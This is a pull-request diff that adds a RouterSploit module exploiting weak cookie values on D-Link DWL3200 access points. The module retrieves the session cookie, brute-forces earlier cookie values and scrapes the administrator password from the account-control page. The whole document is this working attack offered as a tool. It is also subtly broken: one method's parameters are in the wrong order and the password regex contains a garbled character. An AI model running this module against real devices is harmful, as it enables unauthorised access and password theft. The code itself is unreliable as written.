Merge pull request #198 from jabedude/master

D-Link DWL3200AP pw disclosure module

routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py

+# -*- coding:utf-8 -*-
+import re
+
+from routersploit import (
+    exploits,
+    print_error,
+    print_success,
+    print_status,
+    mute,
+    http_request,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploits DLINK DWL3200 access points weak cookie value
+    """
+    __info__ = {
+        'name': 'D-Link AP 3200 - Password Disclosure',
+        'description': 'Exploits DLINK DWL3200 access points weak cookie value',
+        'authors': [
+            'pws',  # Vulnerability discovery
+            'Josh Abraham <sinisterpatrician[at]google.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/34206/',
+        ],
+        'devices': [
+            'DLINK DWL3200',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+
+    def run(self):
+        if self.check():
+            cookie_value = self.get_cookie()
+            print_success("Cookie retrieved: {}".format(cookie_value))
+
+            cookie_int = int(cookie_value, 16)
+            start = cookie_int - 3600
+
+            for i in xrange(cookie_int, start, -1):
+                self.test_cookie(i)
+        else:
+            print_error("Target does not appear to be vulnerable")
+
+    @mute
+    def check(self):
+        """
+        Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr.
+        """
+        if self.get_cookie() is not None:
+            return True
+
+        return False
+
+    def get_cookie(self):
+        """
+        Method that retrieves current cookie from AP
+        """
+        url = "{}:{}".format(self.target, self.port)
+        pattern = "RpWebID=([a-z0-9]{8})"
+        print_status("Attempting to get cookie...")
+        try:
+            r = http_request(method='GET', url=url, timeout=3)
+            tgt_cookie = re.search(pattern, r.text)
+            if tgt_cookie is None:
+                print_error("Unable to retrieve cookie")
+            else:
+                return tgt_cookie.group(1)
+        except Exception:
+            print_error("Unable to connect to target")
+
+    def test_cookie(cookie_int, self):
+        """
+        Method that tests all cookies from past hour to find one that is valid
+        """
+        url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port)
+        cookie = dict(RpWebID=cookie_int)
+        try:
+            r = http_request(method='GET', url=url, cookie=cookie, timeout=10)
+            if ('NAME="OldPwd"' in r.text):
+                print_success("Cookie {} is valid!".format(cookie_int))
+                pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
+                password = re.findall(pattern, r.content)[0].replace('&', ';&')[1:] + ";"
+                print_success("Target password is : {}".format(password))
+        except Exception:
+            print_error("Unable to connect to target")